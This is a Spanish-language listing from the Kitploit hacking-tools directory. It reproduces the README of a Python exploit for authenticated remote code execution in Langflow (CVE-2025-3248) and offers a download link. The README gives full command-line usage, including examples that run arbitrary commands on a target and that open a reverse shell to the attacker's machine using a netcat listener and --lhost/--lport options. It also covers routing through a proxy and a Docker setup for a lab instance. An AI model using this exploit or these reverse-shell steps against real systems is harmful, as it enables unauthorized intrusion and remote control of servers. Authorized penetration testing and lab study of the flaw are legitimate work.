Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RCE-CVE-2025-3248 — Este script de Python explota CVE-2025-3248 para ejecutar comandos arbitrarios o generar una shell inversa en un sistema vulnerable. Se requiere autenticación para usar este exploit. | Kitploit
Herramientas/GitHubGitHub/tiemio/rce-cve-2025-3248
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

Este script de Python explota CVE-2025-3248 para ejecutar comandos arbitrarios o generar una shell inversa en un sistema vulnerable. Se requiere autenticación para usar este exploit.

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Ejecución remota de código autenticada CVE-2025-3248 en Langflow

Este script de Python explota CVE-2025-3248 para ejecutar comandos arbitrarios o generar una reverse shell en un sistema vulnerable. Se requiere autenticación para usar este exploit.


Características

  • Ejecución de comandos autenticada: Ejecuta comandos arbitrarios del sistema en el objetivo.
  • Reverse Shell: Genera una reverse shell hacia tu listener.
  • Soporte de proxy: Enruta las solicitudes a través de un proxy (por ejemplo, Burp Suite).

Requisitos

  • Python 3.x
  • Librería requests

Instala las dependencias con:

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

Argumentos

ArgumentoDescripciónRequerido
-u, --urlURL base del objetivo (p. ej., https://target.com)Sí
-l, --loginNombre de usuario administradorSí
-p, --passwordContraseña de administradorSí
-c, --commandComando a ejecutar en el objetivoNo*
--proxyURL del proxy (p. ej., http://127.0.0.1:8080)No
--lhostHost local para reverse shellNo*
--lportPuerto local para reverse shellNo*

* Debes especificar un comando (-c) o ambos --lhost y --lport para una reverse shell.


Ejemplos

1. Ejecutar un comando

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. Obtener una reverse shell

Inicia un listener en tu máquina:

root@kitploit:~
nc -lvnp 4444

Luego ejecuta:

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. Usar un proxy

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Imagen Docker

Desplegar la imagen

Puedes desplegar la imagen Docker usando el siguiente comando:

root@kitploit:~
podman compose up -d

La imagen estará disponible en http://localhost:7860. Créditos del archivo compose: Este repositorio


Descargo de responsabilidad

Este script es solo para fines educativos y de pruebas de penetración autorizadas. No lo uses contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.


Este readme fue generado por IA.

Descargar herramienta